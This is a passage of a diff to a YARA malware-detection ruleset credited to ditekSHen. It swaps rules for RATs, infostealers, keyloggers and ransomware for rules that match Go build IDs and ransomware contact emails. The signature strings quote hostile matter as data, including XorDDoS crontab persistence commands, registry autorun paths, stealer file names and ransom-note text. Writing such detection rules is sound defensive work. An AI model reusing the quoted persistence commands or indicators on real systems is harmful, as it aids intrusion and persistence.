detected!" fullword wide - $ai3 = "Debug detected!" fullword wide - $ai4 = "Analysis process detected!" fullword wide - $s1 = "Clipboard Monitor Mutex [%s] already created!" wide - $s2 = "ClipboardMonitorThread started!" fullword wide - $s3 = /MonitorClipboardThread\s(finished|terminated)!/ wide - $s4 = /ClipboardMonitor_(x64|x32|Win64|Win32)_DllRelease\.dll/ fullword ascii + $s1 = "Go build ID: \"R6dvaUktgv2SjVXDoMdo/kKgwagwoLRC88DpIXAmx/eipNq7_PQCTCOhZ6Q74q/RHJkCaNdTbd6qgYiA-EC\"" ascii + $s2 = "Go build ID: \"vsdndTwlj03gbEoDu06S/anJkXGh7N08537M0RMms/VG58d99axcdeD_z1JIko/tfDVbCdWUId-VX90kuT7\"" ascii + $s3 = "Go build ID: \"FG9JEesXBQ04oNCv2bIS/MmjCdGa3ogU_6DIz6bZR/AjrqKBSezDfY1t7U9xr-/-06dIpZsukiVcN0PtOCb\"" ascii + $s4 = "Go build ID: \"MJ8bS1emWrrlXiE_C61E/A6GaZzhLls_pFKMGfU1H/ZgswGQy_lzK-I4cZykwm/8JzjhV06jZosSa5Qih5O\"" ascii + $s5 = "Go build ID: \"_vQalVQKn2O8kxxA4vVM/slXlklhnjEF5tawjlPzW/t26rDRURK6ii0MqU7gIx/MNq6vj_uM15RhjVC2QuX\"" ascii + $s6 = "Go build ID: \"KWssFDTp6mq16xlI5c0t/mQLgof0oyp-eYKqNYUFL/Np8S71zE5W5_BsJCpjsj/hXpFDaVCtay2509R05fd\"" ascii condition: - uint16(0)==0x5a4d and (( all of ($ai*) and 1 of ($s*)) or (3 of ($s*) and 1 of ($ai*)) or 5 of them ) + uint16(0)==0x5a4d and 1 of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Cratpluginscreencapture : FILE +rule DITEKSHEN_INDICATOR_KB_Gobuildid_Qnapcrypt : FILE { meta: - description = "Detects CRAT Screen Capture plugin DLL" + description = "Detects Golang Build IDs in known bad samples" author = "ditekSHen" - id = "ef0b6b88-8b1b-5ab5-ad81-276eaff0411f" - date = "2024-09-06" - modified = "2024-09-06" + id = "4cdea15f-d8fd-5720-ba25-eb60e9b0f9ce" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1981-L2000" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "7b4378ae883d01338fabe2eb50a5509b722c661e63afc287afa07b263a0ebc42" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L1590-L1598" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "b3ee583c395701350c091041a72f988d1b5ae607b642b42152fcda29f9be63e2" score = 75 quality = 75 tags = "FILE" strings: - $ai1 = "VM detected!" fullword wide - $ai2 = "Sandbox detected!" fullword wide - $ai3 = "Debug detected!" fullword wide - $ai4 = "Analysis process detected!" fullword wide - $s1 = "User is inactive!, give up capture" wide - $s2 = "Capturing screen..." wide - $s3 = "%s\\P%02d%lu.tmp" fullword wide - $s4 = "CloseHandle ScreenCaptureMutex failure! %d" fullword wide - $s5 = "ScreenCaptureMutex already created! %s" fullword wide - $s6 = "Create ScreenCaptureMutex %s failure %d" fullword wide - $s7 = /ScreenCaptureThread\s(finished|terminated)!/ wide - $s8 = /ScreenCapture_(x64|x32|Win64|Win32)_DllRelease\.dll/ fullword ascii + $s1 = "Go build ID: \"XcBqbQohm7UevdYNABvs/2RcJz1616naXSRu2xvTX/b6F3Jt1-5WAIexSyzeun/MpHqs5fJA5G2D9gVuUCe\"" ascii condition: - uint16(0)==0x5a4d and (( all of ($ai*) and 1 of ($s*)) or (3 of ($s*) and 1 of ($ai*)) or 6 of them ) + uint16(0)==0x5a4d and filesize <8000KB and 1 of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Cratpluginransomhansom : FILE +rule DITEKSHEN_INDICATOR_KB_Gobuildid_Snatch : FILE { meta: - description = "Detects CRAT Hansom Ransomware plugin DLL" + description = "Detects Golang Build IDs in known bad samples" author = "ditekSHen" - id = "0bfc97df-545f-5453-afe0-5777dc1c95b4" - date = "2024-09-06" - modified = "2024-09-06" + id = "6ab6b7bc-c905-5ff9-8059-a2d512ba13b3" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2002-L2020" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "b22f6d22630f311241634513eb051df2b36af84a938c1ae1f5284e5a5d7d3077" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L1600-L1610" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "5a19c791ed0d829c4c97e35cfa604a8716bad3f02632712903d765db95ba87f6" score = 75 - quality = 73 + quality = 75 tags = "FILE" strings: - $cmd1 = "/f /im \"%s\"" wide - $cmd2 = "add HKLM\\%s /v %s /t REG_DWORD /d %d /F" wide - $cmd3 = "add HKCU\\%s /v %s /t REG_DWORD /d %d /F" wide - $cmd4 = "\"%s\" a -y -ep -k -r -s -ibck -df -m0 -hp%s -ri1:%d \"%s\" \"%s\"" wide - $s1 = "\\hansom.jpg" wide - $s2 = "HansomMain" fullword ascii wide - $s3 = "ExtractHansom" fullword ascii wide - $s4 = "Hansom2008" fullword ascii - $s5 = ".hansomkey" fullword wide - $s6 = ".hansom" fullword wide - $s7 = /Ransom_(x64|x32|Win64|Win32)_DllRelease\.dll/ fullword ascii + $s1 = "Go build ID: \"8C2VvDTH-MuUPx8tL42E/PWF9iuE2j_Zt0ANsTlty/c64swZ5TtuaIpHuEFmga/6sS0KWNryc-YAduDnWWO\"" ascii + $s2 = "Go build ID: \"UBrfJ_wztDfCHWakqvlV/LhzfkJwvKFrNhKCHtU9_/sveCupt8GVbvu6WZiyA-/GcimfL_TPl6FTPPriBDr\"" ascii + $s3 = "Go build ID: \"5zCy9jt7UZaIs5YPk4tt/1Yt6v7gCpDG---pRFyW-/7729nLSeKJik31ftz_Ve/Z5EVG3lWak3ynxNrJ4ih\"" ascii condition: - uint16(0)==0x5a4d and ((2 of ($cmd*) and 2 of ($s*)) or (4 of ($s*) and 1 of ($cmd*)) or 6 of them ) + uint16(0)==0x5a4d and 1 of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Aliencrypter : FILE +rule DITEKSHEN_INDICATOR_KB_Gobuildid_Godownloader : FILE { meta: - description = "Detects AlienCrypter injector/downloader/obfuscator" + description = "Detects Golang Build IDs in known bad samples" author = "ditekSHen" - id = "af9e785a-bdec-5d3e-9a50-56f7f1a0507e" - date = "2024-09-06" - modified = "2024-09-06" + id = "da53c062-4a55-543d-b2b6-52acdf13febc" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2022-L2036" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "28a2a6e6d58fd6efbb5753a7be5b621a3eac546d45f9481b9dd2641cbe70b547" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L1612-L1622" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "e0f5ee6ade4608a8b5c5bd02bf5aef0fcb9cb1fe1cc3a9d00b1ace91e5d0d33f" score = 75 quality = 75 tags = "FILE" strings: - $s1 = ".AlienRunPE." ascii wide - $s2 = "RunAsNewUser_RunDLL" fullword wide - $s3 = { 00 50 52 4f 43 45 53 53 5f 53 55 53 50 45 4e 44 5f 52 45 53 55 4d 45 00 64 6e 6c 69 62 2e 50 45 00 } - $s4 = { 2e 41 6c 69 65 6e 52 75 6e 50 45 00 50 52 4f 43 45 53 53 5f 54 45 52 4d 49 4e 41 54 45 00 } - $s5 = "@@@http" wide - $resp1 = "</p><p>@@@77,90," ascii wide - $resp2 = "</p><p>@@@HH,JA," ascii wide + $s1 = "Go build ID: \"1OzJqWaH4h1VtrLP-zk8/G9w32ha7_ziW1Fa-0Byj/gLtfhbXZ6i_W0e5e_tFF/ekG0n9hOcZjmwzRQnRqC\"" ascii + $s2 = "Go build ID: \"kKxyj14l4NhGbuhOgzef/ab_yr_pUn6q2idYdoBhn/hFAjO_Yxc_rN6mHFuHM9/SmS3qmOyJBc_4xV_qg3B\"" ascii + $s3 = "Go build ID: \"MiW7XJnQsBXxlBHro8GW/HMqQknRgJg-mCXomgFRt/88ccKMrfA_s6AcOJs3aM/jSUAU_l3RrMzlV6ANEYE\"" ascii condition: - ( uint16(0)==0x5a4d and 3 of them ) or (1 of ($resp*) and 2 of ($s*)) + uint16(0)==0x5a4d and 1 of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Ficker : FILE +rule DITEKSHEN_INDICATOR_KB_Gobuildid_Ranumbot : FILE { meta: - description = "Detects Ficker infostealer" + description = "Detects Golang Build IDs in known bad samples" author = "ditekSHen" - id = "1cfeea86-e8bf-50fb-ba08-435d7a14a913" - date = "2024-09-06" - modified = "2024-09-06" + id = "f368cd9d-f974-56cf-a2b5-bd300f30cedc" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2038-L2055" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "adcc0ffc0e1ded36dc41c22d10d2ea293d5740484203892bcecf89a5f4001452" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L1624-L1633" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "c3d0ba55ca2be1b11ebf1b82490c5d26f2b35958b31a7e55892e27f24bf4118f" score = 75 quality = 75 tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.Ficker" strings: - $s1 = "JNOde\\" ascii - $s2 = "\"SomeNone" fullword ascii - $s3 = "kindmessage" fullword ascii - $s4 = "..\\\\?\\.\\UNC\\Windows stdio in console mode does not support writting non-UTF-8 byte sequences" ascii - $s5 = "..\\\\?\\.\\UNC\\Windows stdio in console mode does not support writing non-UTF-8 byte sequences" ascii - $s6 = "(os error other os erroroperation interrruptedwrite zerotimed" ascii - $s7 = "(os error other os erroroperation interruptedwrite zerotimed" ascii - $s8 = "nPipeAlreadyExistsWouldBlockInvalidInputInvalidDataTimedOutWriteZeroInterruptedOtherN" fullword ascii - $s9 = "_matherr(): %s in %s(%g, %g) (retval=%g)" ascii + $s1 = "Go build ID: \"hOhuOA4W60aBBRoFQTDA/dl9DuLAgEcabYGK6ZT2t/ECsse3630jV_957OqqK3/ZRA_JRPFzxutK16zlEcM\"" ascii + $s2 = "Go build ID: \"NivDrAudWE-E6xtBXeww/3pv6fDzDqt4v0YxoTkPt/8vd79TNE-9Bt38ftxf_V/_GNqnqEUsRf-WTSmn8dM\"" ascii condition: - uint16(0)==0x5a4d and 5 of them + uint16(0)==0x5a4d and 1 of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Xorist : FILE +rule DITEKSHEN_INDICATOR_KB_Gobuildid_Banload : FILE { meta: - description = "Detects Xorist ransomware" + description = "Detects Golang Build IDs in known bad samples" author = "ditekSHen" - id = "76119441-343d-51c3-90eb-9d54c80a983d" - date = "2024-09-06" - modified = "2024-09-06" + id = "5955afd5-f26f-5df1-b355-b8f168b694b0" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2057-L2078" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "b34e3fa065cabcd8d26908866e53ff599631128e1da884e42a2e63d890879eaa" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L1635-L1643" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "534de1ce161e5e27f380f96b83630aa75031f268658aa7e8ff8ecce82ed5d4cd" score = 75 quality = 75 tags = "FILE" - clamav_sig = "MALWARE.Win.Ransomware.Xorist" strings: - $x1 = { 00 4d 00 41 00 47 00 45 00 0b 00 50 00 55 00 - 53 00 53 00 59 00 4c 00 49 00 43 00 4b 00 45 - 00 52 00 } - $x2 = { 30 70 33 6e 53 4f 75 72 63 33 20 58 30 72 31 35 - 37 2c 20 6d 6f 74 68 65 72 66 75 63 6b 65 72 21 - 00 70 75 73 73 79 6c 69 63 6b 65 72 00 2e 62 6d - 70 00 2e 00 2e 2e 00 6f 70 65 6e 00 2e 65 78 65 } - $s1 = "\\shell\\open\\command" fullword ascii - $s2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" fullword ascii - $s3 = "CRYPTED!" fullword ascii - $s4 = "Attention!" fullword ascii - $s5 = "Password:" fullword ascii - $s6 = { 43 6f 6d 53 70 65 63 00 2f 63 20 64 65 6c 20 22 00 22 20 3e 3e 20 4e 55 4c } + $s1 = "Go build ID: \"a3629ee6ab610a57f242f59a3dd5e5f6de73da40\"" ascii condition: - uint16(0)==0x5a4d and ( all of ($x*) or 5 of ($s*) or (1 of ($x*) and 3 of ($s*))) + uint16(0)==0x5a4d and 1 of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_PYSA : FILE +rule DITEKSHEN_INDICATOR_KB_Gobuildid_Hive : FILE { meta: - description = "Detects PYSA/Mespinoza ransomware" + description = "Detects Golang Build IDs in Hive ransomware" author = "ditekSHen" - id = "3a3fad6a-46bc-51dc-9723-4412034ca442" - date = "2024-09-06" - modified = "2024-09-06" + id = "7d7f7757-de7b-52a7-aab0-8fda38a86fd1" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2080-L2100" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "e614b827bd8d065e94852fed01497c785bf90c52c3624aff9939b3f40ecf96a4" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L1645-L1653" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "f311a3661ea3a26ebca6cd283d1e219011acfdfbb13fa8b919ca2724b9f4aae7" score = 75 quality = 75 tags = "FILE" - clamav_sig = "MALWARE.Win.Ransomware.PYSA" strings: - $s1 = "%s\\Readme.README" fullword wide - $s2 = "Every byte on any types of your devices was encrypted" ascii - $s3 = { 6c 65 67 61 6c 6e 6f 74 69 63 65 74 65 78 74 00 (50|70) (59|79) (53|73) (41|61) } - $s4 = { 6c 65 67 61 6c 6e 6f 74 69 63 65 63 61 70 74 69 6f 6e 00 00 (50|70) (59|79) (53|73) (41|61) } - $s5 = { 2e 62 61 74 00 00 6f 70 65 6e 00 00 00 00 53 - 4f 46 54 57 41 52 45 5c 4d 69 63 72 6f 73 6f - 66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72 - 65 6e 74 56 65 72 73 69 6f 6e 5c 50 6f 6c 69 - 63 69 65 73 5c 53 79 73 74 65 6d 00 00 00 } - $f1 = ".?AVPK_EncryptorFilter@CryptoPP@@" ascii - $f2 = ".?AV?$TF_EncryptorImpl@" ascii - $f3 = "@VTF_EncryptorBase@CryptoPP@@" ascii + $s1 = "Go build ID: \"XDub7DGmWVQ2COC6W4If/XHMqRPf2lnJUiVkG1CR6/u_MaUU0go2UUmLb_INuv/WrZSyz-WMW1st_NaM935\"" ascii condition: - uint16(0)==0x5a4d and all of ($f*) and 3 of ($s*) + uint16(0)==0x5a4d and 1 of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Polar : FILE +rule DITEKSHEN_INDICATOR_KB_Gobuildid_Nodachi : FILE { meta: - description = "Detects Polar ransomware" + description = "Detects Golang Build IDs in Nodachi" author = "ditekSHen" - id = "ab4e4478-5417-5918-b5df-5b6ffe7438a9" - date = "2024-09-06" - modified = "2024-09-06" + id = "9d578768-7995-5fb0-8bf1-9c2221cdef80" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2102-L2123" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "4f05a8ace9a03d02f54f0ebdd5349d1d1b23db8e34aa71edd44eebf02b88745c" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L1655-L1666" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "177269623e0f3850c37c6b203d9a637fa92c0ed3fa823cc8d885f28cb383bf7d" score = 75 quality = 75 tags = "FILE" - clamav_sig = "MALWARE.Win.Ransomware.Polar" strings: - $s1 = "Encrypt Failed ! ErrorMessage :" wide - $s2 = ".locked" fullword wide - $s3 = ".cryptd" fullword wide - $s4 = "$SysReset" fullword wide - $s5 = "Polar.Properties.Resources" ascii wide - $s6 = "AES_EnDecryptor.Basement" fullword ascii - $s7 = "RunCMDCommand" fullword ascii - $s8 = "killerps_list" fullword ascii - $s9 = "clearlog" fullword ascii - $s10 = "encryptFile" fullword ascii - $s11 = "changeBackPictrue" fullword ascii - $pdb1 = "\\Ransomware_ALL_encode\\dir_file\\obj\\x86\\Release\\Encode.pdb" ascii - $pdb2 = "\\Ransomware_ALL_encode\\dir_file\\obj\\x64\\Release\\Encode.pdb" ascii + $s1 = "Go build ID: \"3AAyhKK0wFfCYLdz5oRV/zKyiBHCsAEyDIWhaW5AW/Rb8NLT3q8A2OLm6izDGP/8G9k_gjOTX_PXKna_IMj\"" ascii + $s2 = "Go build ID: \"-eyFd8kbpwxUsutpqZn_/vqzQXX5Ra4qk1XHoqocW/wd-6gLzQKZyEyhVp7qOj/Jr14hyc7pLLgeIZNbfLD\"" ascii + $s3 = "Go build ID: \"xDSqp4KGmd0SAf5irMGh/-kA7PGjKoJcvCgsZDStn/lHeQ1LQOVyQB2NnwIwFP/-D5oEBc23ND7IGLTESdM\"" ascii + $s4 = "Go build ID: \"67RcwNspLH__QJrElMcB/zMJf7Go1s0ZoXqd30Lb_/NaJl4rfcuLEG5LeZ-Y4k/MzFNvW79enRRdx3LmA47\"" ascii condition: - uint16(0)==0x5a4d and (8 of ($s*) or (1 of ($pdb*) and 2 of ($s*))) + uint16(0)==0x5a4d and 1 of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Bitrat : FILE +rule DITEKSHEN_INDICATOR_KB_Gobuildid_Gobrut : FILE { meta: - description = "Detects BitRAT RAT" + description = "Detects Golang Build IDs in GoBrut" author = "ditekSHen" - id = "9041a21f-0f27-5e90-8429-863e361381bf" - date = "2024-09-06" - modified = "2024-09-06" + id = "65953012-fc84-50d0-b769-64df66d8a54b" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2125-L2153" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "128c3c8cea0439f272de241c77fc9ed46e64419e497091e444e98123dad059cb" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L1668-L1676" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "40c305f019cb31222fa75a24315764cb5e5356afaa72aefb59916d615a8fca28" score = 75 - quality = 25 + quality = 75 tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.BitRAT" strings: - $s1 = "\\plg\\" fullword ascii - $s2 = "klgoff_del" fullword ascii - $s3 = "files_delete" ascii - $s4 = "files_zip_start" fullword ascii - $s5 = "files_exec" fullword ascii - $s6 = "drives_get" fullword ascii - $s7 = "srv_list" fullword ascii - $s8 = "con_list" fullword ascii - $s9 = "ddos_stop" fullword ascii - $s10 = "socks5_srv_start" fullword ascii - $s11 = "/getUpdates?offset=" fullword ascii - $s12 = "Action: /dlex" fullword ascii - $s13 = "Action: /clsbrw" fullword ascii - $s14 = "Action: /usb" fullword ascii - $s15 = "/klg" fullword ascii - $s16 = "klg|" fullword ascii - $s17 = "Slowloris" fullword ascii - $s18 = "Bot ID:" ascii - $t1 = "<sz>N/A</sz>" fullword ascii - $t2 = "<silent>N/A</silent>" fullword ascii + $s1 = "Go build ID: \"sf_2_ylcjquGBe4mQ99L/aPvdLbM2z9HfoDN3RazG/8bhYeVA67N-ifbDYCDJe/UZzCu_EFL9f10gSfO4L0\"" ascii condition: - uint16(0)==0x5a4d and (7 of ($s*) or (4 of ($s*) and 1 of ($t*))) + uint16(0)==0x5a4d and 1 of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Poullight : FILE +rule DITEKSHEN_INDICATOR_KB_Gobuildid_Biopassdropper : FILE { meta: - description = "Detects Poullight infostealer" + description = "Detects Golang Build IDs in BioPass dropper" author = "ditekSHen" - id = "c80143f8-9c44-5e96-b1ff-2adb4bf031e4" - date = "2024-09-06" - modified = "2024-09-06" + id = "b82d34d9-7774-5f99-9d76-b5426e015981" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2155-L2176" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "e60ffb10892d35664a088d69c965e130f87bb1a59c257d484bdfe5085074bccd" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L1678-L1686" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "3b586e886b9f901dde1c73aa07ce0d45e4ff417459f298094359ec1c1e02e522" score = 75 quality = 75 tags = "FILE" - snort2_sid = "920074-920075" - snort3_sid = "920074-920075" - clamav_sig = "MALWARE.Win.Trojan.Poullight" strings: - $s1 = "zipx" fullword wide - $s2 = "{0}Windows Defender.exe" fullword wide - $s3 = "pll_test" fullword wide - $s4 = "loginusers.vdf" wide - $s5 = "Stealer by Nixscare" wide - $s6 = "path_lad" fullword ascii - $s7 = "<CheckVM>" ascii - $s8 = "Poullight.Properties" ascii - $s9 = "</ulfile>" fullword wide - $s10 = "{0}processlist.txt" fullword wide - $s11 = "{0}Browsers\\Passwords.txt" fullword wide + $s1 = "Go build ID: \"OS0VlkdEIlcl3WDDr9Za/_oVwEipaaX6V4mEEYg2V/PytlyeIYgV65maz4wT2Y/IQvgbHv3bbLV42i10qq2\"" ascii condition: - uint16(0)==0x5a4d and 7 of them + uint16(0)==0x5a4d and 1 of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Snakekeylogger : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Rhysida { meta: - description = "Detects Snake Keylogger" - author = "ditekSHen" - id = "e44bf33c-916d-5dc3-ba2a-89e13f1511a2" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with Rhysida ransomware" + author = "ditekShen" + id = "7ee0fb41-9267-5b65-ada3-229f2e390da6" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2178-L2207" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "7d787026b290c3c6a43c7de83233f22980733e7401260ff2f763e6f1b534ecba" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L1688-L1697" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "e3e07bab2982a30a5372e6708ede6707d132d410aa5b5b1a29bdb5d06910a88e" score = 75 - quality = 67 - tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.SnakeKeylogger" + quality = 71 + tags = "" strings: - $id1 = "SNAKE-KEYLOGGER" fullword ascii - $id2 = "----------------S--------N--------A--------K--------E----------------" ascii - $s1 = "_KPPlogS" fullword ascii - $s2 = "_Scrlogtimerrr" fullword ascii - $s3 = "_Clpreptimerr" fullword ascii - $s4 = "_clprEPs" fullword ascii - $s5 = "_kLLTIm" fullword ascii - $s6 = "_TPSSends" fullword ascii - $s7 = "_ProHfutimer" fullword ascii - $s8 = "GrabbedClp" fullword ascii - $s9 = "StartKeylogger" fullword ascii - $x1 = "$%SMTPDV$" wide - $x2 = "$#TheHashHere%&" wide - $x3 = "%FTPDV$" wide - $x4 = "$%TelegramDv$" wide - $x5 = "KeyLoggerEventArgs" ascii - $m1 = "| Snake Keylogger" ascii wide - $m2 = /(Screenshot|Clipboard|keystroke) Logs ID/ ascii wide - $m3 = "SnakePW" ascii wide - $m4 = "\\SnakeKeylogger\\" ascii wide + $s1 = "SethZemlak@onionmail.org" ascii wide nocase + $s2 = "JacquieKunze@onionmail.org" ascii wide nocase condition: - ( uint16(0)==0x5a4d and ( all of ($id*) or 6 of ($s*) or (1 of ($id*) and 3 of ($s*)) or 4 of ($x*))) or (2 of ($m*)) + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Linux_Xorddos : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Payola { meta: - description = "Detects XORDDoS" - author = "ditekSHen" - id = "0ca581c3-bce2-5b4f-8146-9aeb49b88813" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with Payola ransomware" + author = "ditekShen" + id = "7c1fc06b-fc71-5679-befd-686b2e05e3a4" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2209-L2220" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "192378d903316c1d80b064e78feb6ed9d2ffc9e6c7dc0c8df223d83d17e4e8d9" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L1699-L1708" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "568141c03d14faef0cfc4f5fbdec45a5109a1ad5cbbe99e76a1db86e7ef4dc5d" score = 75 - quality = 75 - tags = "FILE" + quality = 71 + tags = "" strings: - $s1 = "for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done" fullword ascii - $s2 = "cp /lib/libudev.so /lib/libudev.so.6" fullword ascii - $s3 = "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab" fullword ascii - $s4 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)" fullword ascii + $s1 = "pcsupport@skiff.com" ascii wide nocase + $s2 = "pctalk01@tutanota.com" ascii wide nocase condition: - uint32(0)==0x464c457f and 3 of them + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Blacknet : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Xorist { meta: - description = "Detects BlackNET RAT" - author = "ditekSHen" - id = "c1ece46a-3cd9-54aa-a105-1c5b19357a7e" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with Xorist ransomware" + author = "ditekShen" + id = "151d182c-c60a-54dd-a3d2-b32d27521b57" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2222-L2250" - license_url = 